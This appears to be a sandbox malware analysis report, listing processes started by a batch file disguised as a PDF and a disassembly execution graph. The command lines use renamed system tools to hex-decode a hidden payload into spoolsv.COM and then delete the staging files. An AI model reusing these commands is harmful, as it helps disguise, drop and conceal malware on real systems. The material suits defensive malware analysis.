                                    File size:35'328 bytes
                                    MD5 hash:41330D97BF17D07CD4308264F3032547
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:moderate
                                    Has exited:true

                                    General

                                    Target ID:5
                                    Start time:14:31:38
                                    Start date:05/12/2024
                                    Path:C:\Users\Public\alpha.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\Users\user\Desktop\1x40 CONTAINER.PDF-.bat" "C:\\Users\\Public\\spoolsv.MPEG" 9
                                    Imagebase:0x7ff755ca0000
                                    File size:289'792 bytes
                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    General

                                    Target ID:6
                                    Start time:14:31:38
                                    Start date:05/12/2024
                                    Path:C:\Users\Public\kn.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\\Users\\Public\\kn -decodehex -F "C:\Users\user\Desktop\1x40 CONTAINER.PDF-.bat" "C:\\Users\\Public\\spoolsv.MPEG" 9
                                    Imagebase:0x7ff6c5450000
                                    File size:1'651'712 bytes
                                    MD5 hash:F17616EC0522FC5633151F7CAA278CAA
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Antivirus matches:
                                    • Detection: 0%, ReversingLabs
                                    Reputation:moderate
                                    Has exited:true

                                    General

                                    Target ID:7
                                    Start time:14:31:39
                                    Start date:05/12/2024
                                    Path:C:\Users\Public\alpha.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\spoolsv.MPEG" "C:\\Users\\Public\\Libraries\\spoolsv.COM" 12
                                    Imagebase:0x7ff755ca0000
                                    File size:289'792 bytes
                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    General

                                    Target ID:8
                                    Start time:14:31:39
                                    Start date:05/12/2024
                                    Path:C:\Users\Public\kn.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\spoolsv.MPEG" "C:\\Users\\Public\\Libraries\\spoolsv.COM" 12
                                    Imagebase:0x7ff6c5450000
                                    File size:1'651'712 bytes
                                    MD5 hash:F17616EC0522FC5633151F7CAA278CAA
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:moderate
                                    Has exited:true

                                    General

                                    Target ID:9
                                    Start time:14:31:39
                                    Start date:05/12/2024
                                    Path:C:\Users\Public\alpha.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\kn.exe" / A / F / Q / S
                                    Imagebase:0x7ff755ca0000
                                    File size:289'792 bytes
                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    General

                                    Target ID:10
                                    Start time:14:31:39
                                    Start date:05/12/2024
                                    Path:C:\Users\Public\alpha.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\spoolsv.MPEG" / A / F / Q / S
                                    Imagebase:0x7ff755ca0000
                                    File size:289'792 bytes
                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Disassembly

                                    Reset < >

                                      Execution Graph

                                      Execution Coverage:5.5%
                                      Dynamic/Decrypted Code Coverage:0%
                                      Signature Coverage:33.6%
                                      Total number of Nodes:816
                                      Total number of Limit Nodes:27
                                      execution_graph 17572 7ff755cb20b2 17573 7ff755cb20cf 17572->17573 17574 7ff755cb20be 17572->17574 17578 7ff755cb211c 17573->17578 17601 7ff755cb3060 17573->17601 17575 7ff755cb8f80 7 API calls 17574->17575 17576 7ff755cb2325 17575->17576 17578->17574 17596 7ff755cb2e44 17578->17596 17580 7ff755cb2148 17580->17574 17581 7ff755cb2d70 3 API calls 17580->17581 17582 7ff755cb21af 17581->17582 17583 7ff755cab900 166 API calls 17582->17583 17585 7ff755cb21d0 17583->17585 17584 7ff755cbe04a ??_V@YAXPEAX 17584->17574 17585->17584 17586 7ff755cb22a4 ??_V@YAXPEAX 17585->17586 17587 7ff755cb221c wcsspn 17585->17587 17586->17574 17589 7ff755cab900 166 API calls 17587->17589 17590 7ff755cb223b 17589->17590 17590->17584 17591 7ff755cb2252 17590->17591 17592 7ff755cb228f 17591->17592 17594 7ff755cbe06d wcschr 17591->17594 17595 7ff755cbe090 towupper 17591->17595 17593 7ff755cad3f0 223 API calls 17592->17593 17593->17586 17594->17591 17595->17591 17595->17592 17597 7ff755cb9324 malloc 17596->17597 17598 7ff755cb2e7b 17597->17598 17599 7ff755cb2e83 memset 17598->17599 17600 7ff755cb2e90 17598->17600 17599->17600 17600->17580 17602 7ff755cb1ea0 8 API calls 17601->17602 17603 7ff755cb3084 17602->17603 17604 7ff755cbe4fc 17603->17604 17607 7ff755cb30b1 17603->17607 17605 7ff755cb417c 166 API calls 17604->17605 17610 7ff755cb311a 17605->17610 17606 7ff755cb30c8 SetErrorMode SetErrorMode GetFullPathNameW SetErrorMode 17606->17610 17607->17606 17608 7ff755cbe557 17607->17608 17609 7ff755cb417c 166 API calls 17608->17609 17609->17610 17610->17578 17610->17610 18641 7ff755ca78d0 18646 7ff755cabe00 18641->18646 18644 7ff755cabe00 647 API calls 18645 7ff755ca78f0 18644->18645 18647 7ff755ca78e4 18646->18647 18648 7ff755cabe1b 18646->18648 18647->18644 18647->18645 18648->18647 18649 7ff755cabe47 memset 18648->18649 18650 7ff755cabe67 18648->18650 18753 7ff755cabff0 18649->18753 18652 7ff755cabe73 18650->18652 18653 7ff755cabf29 18650->18653 18656 7ff755cabeaf 18650->18656 18654 7ff755cabe92 18652->18654 18657 7ff755cabf0c 18652->18657 18655 7ff755cacd90 166 API calls 18653->18655 18663 7ff755cabea1 18654->18663 18680 7ff755cac620 GetConsoleTitleW 18654->18680 18659 7ff755cabf33 18655->18659 18656->18647 18661 7ff755cabff0 185 API calls 18656->18661 18791 7ff755cab0d8 memset 18657->18791 18659->18656 18664 7ff755cabf70 18659->18664 18667 7ff755ca88a8 _wcsicmp 18659->18667 18661->18647 18663->18656 18670 7ff755caaf98 2 API calls 18663->18670 18674 7ff755cabf75 18664->18674 18904 7ff755ca71ec 18664->18904 18665 7ff755cabf1e 18665->18656 18669 7ff755cabf5a 18667->18669 18668 7ff755cabfa9 18668->18656 18671 7ff755cacd90 166 API calls 18668->18671 18669->18664 18851 7ff755cb0a6c 18669->18851 18670->18656 18673 7ff755cabfbb 18671->18673 18673->18656 18676 7ff755cb081c 166 API calls 18673->18676 18675 7ff755cab0d8 194 API calls 18674->18675 18677 7ff755cabf7f 18675->18677 18676->18674 18677->18656 18724 7ff755cb5ad8 18677->18724 18681 7ff755caca2f 18680->18681 18683 7ff755cac675 18680->18683 18682 7ff755cbc5fc GetLastError 18681->18682 18685 7ff755ca3278 166 API calls 18681->18685 18686 7ff755cb855c ??_V@YAXPEAX 18681->18686 18682->18681 18684 7ff755caca40 17 API calls 18683->18684 18696 7ff755cac69b 18684->18696 18685->18681 18686->18681 18687 7ff755cb291c 8 API calls 18690 7ff755cac762 18687->18690 18688 7ff755cac9b5 18693 7ff755cb855c ??_V@YAXPEAX 18688->18693 18689 7ff755ca89c0 23 API calls 18694 7ff755cac964 18689->18694 18690->18681 18690->18687 18692 7ff755cb855c ??_V@YAXPEAX 18690->18692 18690->18694 18710 7ff755cac78a wcschr 18690->18710 18711 7ff755cac83d 18690->18711 18713 7ff755caca25 18690->18713 18716 7ff755cbc684 18690->18716 18718 7ff755caca2a 18690->18718 18691 7ff755cac978 towupper 18691->18694 18692->18690 18695 7ff755cac855 18693->18695 18694->18682 18694->18688 18694->18689 18694->18690 18694->18691 18694->18694 18699 7ff755ccec14 173 API calls 18694->18699 18720 7ff755caca16 GetLastError 18694->18720 18698 7ff755cac872 18695->18698 18703 7ff755cbc6b8 SetConsoleTitleW 18695->18703 18696->18681 18696->18688 18696->18690 18697 7ff755cad3f0 223 API calls 18696->18697 18700 7ff755cac741 18697->18700 18702 7ff755cb855c ??_V@YAXPEAX 18698->18702 18699->18690 18701 7ff755cac74d 18700->18701 18705 7ff755cac8b5 wcsncmp 18700->18705 18701->18690 18706 7ff755cabd38 207 API calls 18701->18706 18704 7ff755cac87c 18702->18704 18703->18698 18707 7ff755cb8f80 7 API calls 18704->18707 18705->18690 18705->18701 18706->18690 18708 7ff755cac88e 18707->18708 18708->18663 18710->18690 18910 7ff755cacb40 18711->18910 18715 7ff755ca3278 166 API calls 18713->18715 18715->18681 18717 7ff755ca3278 166 API calls 18716->18717 18717->18681 18719 7ff755cb9158 7 API calls 18718->18719 18719->18681 18722 7ff755ca3278 166 API calls 18720->18722 18723 7ff755cbc675 18722->18723 18723->18681 18725 7ff755cacd90 166 API calls 18724->18725 18726 7ff755cb5b12 18725->18726 18727 7ff755cacb40 166 API calls 18726->18727 18752 7ff755cb5b8b 18726->18752 18729 7ff755cb5b26 18727->18729 18728 7ff755cb8f80 7 API calls 18730 7ff755cabf99 18728->18730 18731 7ff755cb0a6c 273 API calls 18729->18731 18729->18752 18730->18663 18732 7ff755cb5b43 18731->18732 18733 7ff755cb5bb8 18732->18733 18734 7ff755cb5b48 GetConsoleTitleW 18732->18734 18735 7ff755cb5bf4 18733->18735 18736 7ff755cb5bbd GetConsoleTitleW 18733->18736 18737 7ff755cacad4 172 API calls 18734->18737 18738 7ff755cbf452 18735->18738 18739 7ff755cb5bfd 18735->18739 18741 7ff755cacad4 172 API calls 18736->18741 18740 7ff755cb5b66 18737->18740 18743 7ff755cb3c24 166 API calls 18738->18743 18745 7ff755cbf462 18739->18745 18746 7ff755cb5c1b 18739->18746 18739->18752 18926 7ff755cb4224 InitializeProcThreadAttributeList 18740->18926 18744 7ff755cb5bdb 18741->18744 18743->18752 18986 7ff755ca96e8 18744->18986 18750 7ff755ca3278 166 API calls 18745->18750 18749 7ff755ca3278 166 API calls 18746->18749 18747 7ff755cb5b7f 18751 7ff755cb5c3c SetConsoleTitleW 18747->18751 18749->18752 18750->18752 18751->18752 18752->18728 18754 7ff755cac01c 18753->18754 18783 7ff755cac0c4 18753->18783 18755 7ff755cac022 18754->18755 18756 7ff755cac086 18754->18756 18757 7ff755cac030 18755->18757 18758 7ff755cac113 18755->18758 18760 7ff755cac144 18756->18760 18772 7ff755cac094 18756->18772 18759 7ff755cac039 wcschr 18757->18759 18770 7ff755cac053 18757->18770 18769 7ff755caff70 2 API calls 18758->18769 18758->18770 18762 7ff755cac301 18759->18762 18759->18770 18761 7ff755cac151 18760->18761 18790 7ff755cac1c8 18760->18790 19312 7ff755cac460 18761->19312 18768 7ff755cacd90 166 API calls 18762->18768 18763 7ff755cac0c6 18766 7ff755cac0cf wcschr 18763->18766 18777 7ff755cac073 18763->18777 18765 7ff755cac460 183 API calls 18765->18772 18773 7ff755cac1be 18766->18773 18766->18777 18767 7ff755cac058 18774 7ff755caff70 2 API calls 18767->18774 18767->18777 18789 7ff755cac30b 18768->18789 18769->18770 18770->18763 18770->18767 18780 7ff755cac211 18770->18780 18772->18765 18772->18783 18775 7ff755cacd90 166 API calls 18773->18775 18774->18777 18775->18790 18776 7ff755cac460 183 API calls 18776->18783 18778 7ff755cac460 183 API calls 18777->18778 18777->18783 18778->18777 18779 7ff755cac285 18779->18780 18785 7ff755cab6b0 170 API calls 18779->18785 18782 7ff755caff70 2 API calls 18780->18782 18781 7ff755cad840 178 API calls 18781->18789 18782->18783 18783->18650 18784 7ff755cab6b0 170 API calls 18784->18770 18787 7ff755cac2ac 18785->18787 18786 7ff755cad840 178 API calls 18786->18790 18787->18777 18787->18780 18788 7ff755cac3d4 18788->18777 18788->18780 18788->18784 18789->18780 18789->18781 18789->18783 18789->18788 18790->18779 18790->18780 18790->18783 18790->18786 18792 7ff755caca40 17 API calls 18791->18792 18807 7ff755cab162 18792->18807 18793 7ff755cab303 18796 7ff755cb8f80 7 API calls 18793->18796 18794 7ff755cab2f7 ??_V@YAXPEAX 18794->18793 18795 7ff755cab1d9 18799 7ff755cacd90 166 API calls 18795->18799 18814 7ff755cab1ed 18795->18814 18798 7ff755cab315 18796->18798 18797 7ff755cb1ea0 8 API calls 18797->18807 18798->18654 18798->18665 18799->18814 18801 7ff755cbbfef _get_osfhandle SetFilePointer 18804 7ff755cbc01d 18801->18804 18801->18814 18802 7ff755cab228 _get_osfhandle 18803 7ff755cab23f _get_osfhandle 18802->18803 18802->18814 18803->18814 18806 7ff755cb33f0 _vsnwprintf 18804->18806 18809 7ff755cbc038 18806->18809 18807->18795 18807->18797 18807->18807 18841 7ff755cab2e1 18807->18841 18808 7ff755cb01b8 6 API calls 18808->18814 18813 7ff755ca3278 166 API calls 18809->18813 18810 7ff755cb33f0 _vsnwprintf 18810->18809 18811 7ff755cad208 _close 18811->18814 18812 7ff755cb26e0 19 API calls 18812->18814 18815 7ff755cbc1f9 18813->18815 18814->18801 18814->18802 18814->18808 18814->18811 18814->18812 18816 7ff755cbc060 18814->18816 18818 7ff755cab038 _dup2 18814->18818 18819 7ff755cbc246 18814->18819 18824 7ff755cab356 18814->18824 18837 7ff755cbc1c3 18814->18837 18814->18841 18850 7ff755cbc1a5 18814->18850 19326 7ff755caaffc _dup 18814->19326 19328 7ff755ccf318 _get_osfhandle GetFileType 18814->19328 18817 7ff755caaf98 2 API calls 18815->18817 18816->18819 18822 7ff755cb09f4 2 API calls 18816->18822 18817->18841 18818->18814 18820 7ff755caaf98 2 API calls 18819->18820 18823 7ff755cbc24b 18820->18823 18821 7ff755cab038 _dup2 18825 7ff755cbc1b7 18821->18825 18826 7ff755cbc084 18822->18826 18827 7ff755ccf1d8 166 API calls 18823->18827 18833 7ff755caaf98 2 API calls 18824->18833 18828 7ff755cbc207 18825->18828 18829 7ff755cbc1be 18825->18829 18830 7ff755cab900 166 API calls 18826->18830 18827->18841 18832 7ff755cad208 _close 18828->18832 18834 7ff755cad208 _close 18829->18834 18831 7ff755cbc08c 18830->18831 18835 7ff755cbc094 wcsrchr 18831->18835 18847 7ff755cbc0ad 18831->18847 18832->18824 18836 7ff755cbc211 18833->18836 18834->18837 18835->18847 18838 7ff755cb33f0 _vsnwprintf 18836->18838 18837->18810 18839 7ff755cbc22c 18838->18839 18840 7ff755ca3278 166 API calls 18839->18840 18840->18841 18841->18793 18841->18794 18842 7ff755cbc106 18843 7ff755caff70 2 API calls 18842->18843 18845 7ff755cbc13b 18843->18845 18844 7ff755cbc0e0 _wcsnicmp 18844->18847 18845->18819 18846 7ff755cbc146 SearchPathW 18845->18846 18846->18819 18848 7ff755cbc188 18846->18848 18847->18842 18847->18844 18847->18847 18849 7ff755cb26e0 19 API calls 18848->18849 18849->18850 18850->18821 18852 7ff755cb1ea0 8 API calls 18851->18852 18853 7ff755cb0ab9 18852->18853 18854 7ff755cb0b12 memset 18853->18854 18855 7ff755cbd927 18853->18855 18856 7ff755cb0aee _wcsnicmp 18853->18856 18862 7ff755cb128f ??_V@YAXPEAX 18853->18862 18857 7ff755caca40 17 API calls 18854->18857 18859 7ff755cb081c 166 API calls 18855->18859 18856->18854 18856->18855 18858 7ff755cb0b5a 18857->18858 18861 7ff755cab364 17 API calls 18858->18861 18872 7ff755cbd94e 18858->18872 18860 7ff755cbd933 18859->18860 18860->18854 18860->18862 18887 7ff755cb0b6f 18861->18887 18863 7ff755cbd96b ??_V@YAXPEAX 18863->18872 18864 7ff755cb0b8c wcschr 18864->18887 18867 7ff755cbd99a wcschr 18867->18872 18868 7ff755cb0c0f wcsrchr 18868->18872 18868->18887 18869 7ff755cbd9ca GetFileAttributesW 18869->18872 18888 7ff755cbda64 18869->18888 18870 7ff755cb081c 166 API calls 18870->18887 18871 7ff755cbda90 GetFileAttributesW 18871->18872 18873 7ff755cbdaa8 GetLastError 18871->18873 18872->18863 18872->18867 18872->18869 18874 7ff755cbd9fd ??_V@YAXPEAX 18872->18874 18872->18888 18875 7ff755cbdab9 18873->18875 18873->18888 18874->18872 18875->18872 18876 7ff755cacd90 166 API calls 18876->18887 18877 7ff755cad3f0 223 API calls 18877->18887 18878 7ff755cb3060 171 API calls 18878->18887 18879 7ff755cb1ea0 8 API calls 18879->18887 18880 7ff755caaf74 170 API calls 18880->18887 18881 7ff755cb0d71 wcsrchr 18882 7ff755cb0d97 NeedCurrentDirectoryForExePathW 18881->18882 18881->18887 18882->18872 18882->18887 18883 7ff755cb291c 8 API calls 18883->18887 18884 7ff755cb0fb1 wcsrchr 18886 7ff755cb0fd0 wcschr 18884->18886 18884->18887 18885 7ff755cb2eb4 22 API calls 18885->18887 18886->18888 18889 7ff755cb0fed wcschr 18886->18889 18887->18862 18887->18864 18887->18868 18887->18870 18887->18872 18887->18876 18887->18877 18887->18878 18887->18879 18887->18880 18887->18881 18887->18883 18887->18884 18887->18885 18887->18886 18891 7ff755cb10fd wcsrchr 18887->18891 18899 7ff755cb1087 _wcsicmp 18887->18899 18901 7ff755cbda74 18887->18901 19329 7ff755cb3bac 18887->19329 19333 7ff755cb2efc 18887->19333 18889->18887 18889->18888 18891->18887 18892 7ff755cb111a _wcsicmp 18891->18892 18893 7ff755cb1138 _wcsicmp 18892->18893 18894 7ff755cb123d 18892->18894 18893->18894 18903 7ff755cb10c5 18893->18903 18895 7ff755cb1250 ??_V@YAXPEAX 18894->18895 18896 7ff755cb1175 18894->18896 18895->18896 18898 7ff755cb8f80 7 API calls 18896->18898 18897 7ff755cb1169 ??_V@YAXPEAX 18897->18896 18900 7ff755cb1189 18898->18900 18899->18901 18902 7ff755cb10a7 _wcsicmp 18899->18902 18900->18664 18901->18871 18901->18888 18902->18901 18902->18903 18903->18896 18903->18897 18906 7ff755ca7211 _setjmp 18904->18906 18909 7ff755ca7279 18904->18909 18907 7ff755ca7265 18906->18907 18906->18909 19347 7ff755ca72b0 18907->19347 18909->18668 18911 7ff755cacb63 18910->18911 18912 7ff755cacd90 166 API calls 18911->18912 18913 7ff755cac848 18912->18913 18913->18695 18914 7ff755cacad4 18913->18914 18915 7ff755cacad9 18914->18915 18923 7ff755cacb05 18914->18923 18916 7ff755cacd90 166 API calls 18915->18916 18915->18923 18917 7ff755cbc722 18916->18917 18918 7ff755cbc72e GetConsoleTitleW 18917->18918 18917->18923 18919 7ff755cbc74a 18918->18919 18918->18923 18920 7ff755cab6b0 170 API calls 18919->18920 18925 7ff755cbc778 18920->18925 18921 7ff755cbc7ec 18922 7ff755caff70 2 API calls 18921->18922 18922->18923 18923->18695 18924 7ff755cbc7dd SetConsoleTitleW 18924->18921 18925->18921 18925->18924 18927 7ff755cbecd4 GetLastError 18926->18927 18928 7ff755cb42ab UpdateProcThreadAttribute 18926->18928 18929 7ff755cbecee 18927->18929 18930 7ff755cbecf0 GetLastError 18928->18930 18931 7ff755cb42eb memset memset GetStartupInfoW 18928->18931 19023 7ff755cc9eec 18930->19023 18933 7ff755cb3a90 170 API calls 18931->18933 18935 7ff755cb43a8 18933->18935 18936 7ff755cab900 166 API calls 18935->18936 18937 7ff755cb43bb 18936->18937 18938 7ff755cb4638 _local_unwind 18937->18938 18939 7ff755cb43cc 18937->18939 18938->18939 18940 7ff755cb4415 18939->18940 18941 7ff755cb43de wcsrchr 18939->18941 19010 7ff755cb5a68 _get_osfhandle SetConsoleMode _get_osfhandle SetConsoleMode 18940->19010 18941->18940 18942 7ff755cb43f7 lstrcmpW 18941->18942 18942->18940 18944 7ff755cb4668 18942->18944 19011 7ff755cc9044 18944->19011 18945 7ff755cb441a 18947 7ff755cb442a CreateProcessW 18945->18947 18949 7ff755cb4596 CreateProcessAsUserW 18945->18949 18948 7ff755cb448b 18947->18948 18950 7ff755cb4672 GetLastError 18948->18950 18951 7ff755cb4495 CloseHandle 18948->18951 18949->18948 18965 7ff755cb468d 18950->18965 18952 7ff755cb498c 8 API calls 18951->18952 18953 7ff755cb44c5 18952->18953 18957 7ff755cb44cd 18953->18957 18953->18965 18954 7ff755cb47a3 18954->18747 18955 7ff755cb44f8 18955->18954 18958 7ff755cb4612 18955->18958 18960 7ff755cb5cb4 7 API calls 18955->18960 18956 7ff755cacd90 166 API calls 18959 7ff755cb4724 18956->18959 18957->18954 18957->18955 18975 7ff755cca250 33 API calls 18957->18975 18961 7ff755cb461c 18958->18961 18963 7ff755cb47e1 CloseHandle 18958->18963 18962 7ff755cb472c _local_unwind 18959->18962 18971 7ff755cb473d 18959->18971 18964 7ff755cb4517 18960->18964 18966 7ff755caff70 GetProcessHeap RtlFreeHeap 18961->18966 18962->18971 18963->18961 18967 7ff755cb33f0 _vsnwprintf 18964->18967 18965->18956 18965->18957 18969 7ff755cb47fa DeleteProcThreadAttributeList 18966->18969 18968 7ff755cb4544 18967->18968 18970 7ff755cb498c 8 API calls 18968->18970 18972 7ff755cb8f80 7 API calls 18969->18972 18974 7ff755cb4558 18970->18974 18978 7ff755caff70 GetProcessHeap RtlFreeHeap 18971->18978 18973 7ff755cb4820 18972->18973 18973->18747 18976 7ff755cb4564 18974->18976 18977 7ff755cb47ae 18974->18977 18975->18955 18979 7ff755cb498c 8 API calls 18976->18979 18980 7ff755cb33f0 _vsnwprintf 18977->18980 18981 7ff755cb475b _local_unwind 18978->18981 18982 7ff755cb4577 18979->18982 18980->18958 18981->18957 18982->18961 18983 7ff755cb457f 18982->18983 18984 7ff755cca920 210 API calls 18983->18984 18985 7ff755cb4584 18984->18985 18985->18961 19003 7ff755ca9737 18986->19003 18988 7ff755cacd90 166 API calls 18988->19003 18989 7ff755ca977d memset 18990 7ff755caca40 17 API calls 18989->18990 18990->19003 18991 7ff755cbb76e 18993 7ff755ca3278 166 API calls 18991->18993 18992 7ff755cbb7b3 18995 7ff755cbb787 18993->18995 18994 7ff755cbb79a 18997 7ff755cb855c ??_V@YAXPEAX 18994->18997 18998 7ff755cbb795 18995->18998 19113 7ff755cce944 18995->19113 18996 7ff755cab364 17 API calls 18996->19003 18997->18992 19121 7ff755cc7694 18998->19121 19003->18988 19003->18989 19003->18991 19003->18992 19003->18994 19003->18996 19003->19003 19005 7ff755ca986d 19003->19005 19025 7ff755cb1fac memset 19003->19025 19052 7ff755cace10 19003->19052 19102 7ff755ca96b4 19003->19102 19107 7ff755cb5920 19003->19107 19006 7ff755ca9880 ??_V@YAXPEAX 19005->19006 19007 7ff755ca988c 19005->19007 19006->19007 19008 7ff755cb8f80 7 API calls 19007->19008 19009 7ff755ca989d 19008->19009 19009->18747 19012 7ff755cb3a90 170 API calls 19011->19012 19013 7ff755cc9064 19012->19013 19014 7ff755cc9083 19013->19014 19015 7ff755cc906e 19013->19015 19018 7ff755cacd90 166 API calls 19014->19018 19016 7ff755cb498c 8 API calls 19015->19016 19017 7ff755cc9081 19016->19017 19017->18940 19019 7ff755cc909b 19018->19019 19019->19017 19020 7ff755cb498c 8 API calls 19019->19020 19021 7ff755cc90ec 19020->19021 19022 7ff755caff70 2 API calls 19021->19022 19022->19017 19024 7ff755cbed0a DeleteProcThreadAttributeList 19023->19024 19024->18929 19027 7ff755cb203b 19025->19027 19026 7ff755cb20b0 19029 7ff755cb3060 171 API calls 19026->19029 19031 7ff755cb211c 19026->19031 19027->19026 19028 7ff755cb2094 19027->19028 19030 7ff755cb20a6 19028->19030 19032 7ff755ca3278 166 API calls 19028->19032 19029->19031 19034 7ff755cb8f80 7 API calls 19030->19034 19031->19030 19033 7ff755cb2e44 2 API calls 19031->19033 19032->19030 19036 7ff755cb2148 19033->19036 19035 7ff755cb2325 19034->19035 19035->19003 19036->19030 19037 7ff755cb2d70 3 API calls 19036->19037 19038 7ff755cb21af 19037->19038 19039 7ff755cab900 166 API calls 19038->19039 19041 7ff755cb21d0 19039->19041 19040 7ff755cbe04a ??_V@YAXPEAX 19040->19030 19041->19040 19041->19041 19042 7ff755cb221c wcsspn 19041->19042 19051 7ff755cb22a4 ??_V@YAXPEAX 19041->19051 19044 7ff755cab900 166 API calls 19042->19044 19045 7ff755cb223b 19044->19045 19045->19040 19048 7ff755cb2252 19045->19048 19046 7ff755cb228f 19047 7ff755cad3f0 223 API calls 19046->19047 19047->19051 19048->19046 19049 7ff755cbe06d wcschr 19048->19049 19050 7ff755cbe090 towupper 19048->19050 19049->19048 19050->19046 19050->19048 19051->19030 19090 7ff755cad0f8 19052->19090 19101 7ff755cace5b 19052->19101 19053 7ff755cb8f80 7 API calls 19056 7ff755cad10a 19053->19056 19054 7ff755cbc860 19055 7ff755cbc97c 19054->19055 19160 7ff755ccee88 19054->19160 19059 7ff755cce9b4 197 API calls 19055->19059 19056->19003 19061 7ff755cbc981 longjmp 19059->19061 19064 7ff755cbc99a 19061->19064 19062 7ff755cbc882 EnterCriticalSection LeaveCriticalSection 19070 7ff755cad0e3 19062->19070 19063 7ff755cbc95c 19063->19055 19068 7ff755ca96b4 186 API calls 19063->19068 19067 7ff755cbc9b3 ??_V@YAXPEAX 19064->19067 19064->19090 19065 7ff755cacd90 166 API calls 19065->19101 19067->19090 19068->19063 19069 7ff755caceaa _tell 19071 7ff755cad208 _close 19069->19071 19070->19003 19071->19101 19072 7ff755cbc9d5 19073 7ff755ccd610 167 API calls 19072->19073 19075 7ff755cbc9da 19073->19075 19074 7ff755cab900 166 API calls 19074->19101 19076 7ff755cbca07 19075->19076 19078 7ff755ccbfec 176 API calls 19075->19078 19077 7ff755cce91c 198 API calls 19076->19077 19082 7ff755cbca0c 19077->19082 19079 7ff755cbc9f1 19078->19079 19081 7ff755ca3240 166 API calls 19079->19081 19080 7ff755cacf33 memset 19080->19101 19081->19076 19082->19003 19083 7ff755caca40 17 API calls 19083->19101 19084 7ff755cad184 wcschr 19084->19101 19085 7ff755ccbfec 176 API calls 19085->19101 19086 7ff755cbc9c9 19088 7ff755cb855c ??_V@YAXPEAX 19086->19088 19087 7ff755cad1a7 wcschr 19087->19101 19088->19090 19090->19053 19091 7ff755cb0a6c 273 API calls 19091->19101 19092 7ff755cabe00 635 API calls 19092->19101 19093 7ff755cb3448 166 API calls 19093->19101 19094 7ff755cb0580 12 API calls 19096 7ff755cad003 GetConsoleOutputCP GetCPInfo 19094->19096 19095 7ff755cacfab _wcsicmp 19095->19101 19097 7ff755cb04f4 3 API calls 19096->19097 19097->19101 19099 7ff755cb1fac 238 API calls 19099->19101 19100 7ff755cad044 ??_V@YAXPEAX 19100->19101 19101->19054 19101->19064 19101->19065 19101->19070 19101->19072 19101->19074 19101->19080 19101->19083 19101->19084 19101->19085 19101->19086 19101->19087 19101->19090 19101->19091 19101->19092 19101->19093 19101->19094 19101->19095 19101->19099 19101->19100 19127 7ff755cb0494 19101->19127 19140 7ff755cadf60 19101->19140 19196 7ff755cc778c 19101->19196 19227 7ff755ccc738 19101->19227 19103 7ff755cbb6e2 RevertToSelf CloseHandle 19102->19103 19104 7ff755ca96c8 19102->19104 19105 7ff755ca96ce 19104->19105 19106 7ff755ca6a48 184 API calls 19104->19106 19105->19003 19106->19104 19108 7ff755cb5a12 19107->19108 19109 7ff755cb596c 19107->19109 19108->19003 19109->19108 19110 7ff755cb598d VirtualQuery 19109->19110 19110->19108 19112 7ff755cb59ad 19110->19112 19111 7ff755cb59b7 VirtualQuery 19111->19108 19111->19112 19112->19108 19112->19111 19114 7ff755cce954 19113->19114 19115 7ff755cce990 19113->19115 19117 7ff755ccee88 390 API calls 19114->19117 19116 7ff755cce9b4 197 API calls 19115->19116 19118 7ff755cce995 longjmp 19116->19118 19119 7ff755cce964 19117->19119 19119->19115 19120 7ff755ca96b4 186 API calls 19119->19120 19120->19119 19125 7ff755cc76a3 19121->19125 19122 7ff755cc76b7 19124 7ff755cce9b4 197 API calls 19122->19124 19123 7ff755ca96b4 186 API calls 19123->19125 19126 7ff755cc76bc longjmp 19124->19126 19125->19122 19125->19123 19128 7ff755cb04a4 19127->19128 19129 7ff755cb26e0 19 API calls 19128->19129 19130 7ff755cb04b9 _get_osfhandle SetFilePointer 19128->19130 19131 7ff755cbd845 19128->19131 19133 7ff755cbd839 19128->19133 19135 7ff755ca3278 166 API calls 19128->19135 19129->19128 19130->19101 19132 7ff755ccf1d8 166 API calls 19131->19132 19134 7ff755cbd837 19132->19134 19136 7ff755ca3278 166 API calls 19133->19136 19137 7ff755cbd819 _getch 19135->19137 19136->19134 19137->19128 19138 7ff755cbd832 19137->19138 19237 7ff755ccbde4 EnterCriticalSection LeaveCriticalSection 19138->19237 19141 7ff755cadfe2 19140->19141 19142 7ff755cadf93 19140->19142 19144 7ff755cae100 VirtualFree 19141->19144 19145 7ff755cae00b _setjmp 19141->19145 19142->19141 19143 7ff755cadf9f GetProcessHeap RtlFreeHeap 19142->19143 19143->19141 19143->19142 19144->19141 19146 7ff755cae04a 19145->19146 19154 7ff755cae0c3 19145->19154 19147 7ff755cae600 473 API calls 19146->19147 19148 7ff755cae073 19147->19148 19149 7ff755cae081 19148->19149 19150 7ff755cae0e0 longjmp 19148->19150 19151 7ff755cad250 475 API calls 19149->19151 19153 7ff755cae0b0 19150->19153 19152 7ff755cae086 19151->19152 19152->19153 19157 7ff755cae600 473 API calls 19152->19157 19153->19154 19238 7ff755ccd3fc 19153->19238 19154->19069 19158 7ff755cae0a7 19157->19158 19158->19153 19159 7ff755ccd610 167 